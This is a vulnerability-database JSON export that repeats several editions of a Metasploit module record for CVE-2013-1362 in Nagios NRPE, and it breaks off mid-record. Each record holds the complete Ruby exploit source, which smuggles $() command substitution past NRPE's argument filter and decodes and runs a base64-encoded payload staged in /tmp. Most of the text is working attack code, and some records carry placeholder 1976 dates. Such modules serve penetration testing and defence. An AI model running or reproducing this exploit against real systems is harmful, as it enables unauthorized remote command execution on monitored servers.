"MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-02T21:07:03", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-02T21:07:03", "differentElements": ["modified", "published"], "edition": 80}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-03T01:10:03", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-03T01:10:03", "differentElements": ["modified", "published"], "edition": 81}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-03T07:17:10", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-03T07:17:10", "differentElements": ["modified", "published"], "edition": 82}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-03T09:02:37", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-03T09:02:37", "differentElements": ["modified", "published"], "edition": 83}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-12T15:33:47", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's 